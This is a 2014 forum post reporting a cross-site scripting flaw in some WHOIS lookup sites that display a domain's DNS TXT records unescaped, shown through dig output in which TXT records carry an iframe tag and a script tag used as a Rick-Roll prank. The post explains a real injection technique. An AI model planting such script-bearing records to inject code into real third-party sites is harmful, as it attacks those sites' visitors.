It is currently Sat Jan 23, 2021 3:08 am

XSS vulnerability in some WHOIS providers... via TXT records

If you have something technology-related to share and don't feel like cluttering up General Chat, post it here. Anything is fair game and anything highly technical is preferred.

XSS vulnerability in some WHOIS providers... via TXT records

Postby Zancarius » Thu Sep 18, 2014 11:05 am

That's right, XSS vulnerabilities are present in some WHOIS providers. All you have to do is put something in the TXT record of a domain you control, and anyone who visits the appropriately affected site gets Rick-Rolled.

(XSS = Cross-site Scripting vulnerability.)

Here's what the onerous TXT record appears to be as of this writing:

Code: Select all
[gridlock:~]$ dig txt

; <<>> DiG 9.9.2-P2 <<>> txt
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 22275
;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 2, ADDITIONAL: 3

; EDNS: version: 0, flags:; udp: 4096
;            IN      TXT

;; ANSWER SECTION:     300     IN      TXT     "<iframe width='420' height='315' src='//' frameborder='0' allowfullscreen></iframe>"     300     IN      TXT     "v=spf1 ?all"     300     IN      TXT     "google-site-verification=nZUP4BagJAjQZO6AImXyzJZBXBf9s1FbDZr8pzNLTCI"     300     IN      TXT     "<script src='//'></script>"

;; AUTHORITY SECTION:     172800  IN      NS     172800  IN      NS

;; ADDITIONAL SECTION: 12161   IN      A 12161   IN      AAAA    2400:cb00:2049:1::adf5:3b74

I gave that lich a phylactery shard. Liches love phylactery shards.
User avatar
Site Admin
Posts: 3907
Joined: Wed Jul 05, 2006 3:06 pm
Location: New Mexico
Gender: Male

Return to Technology Lounge

Who is online

Users browsing this forum: No registered users and 1 guest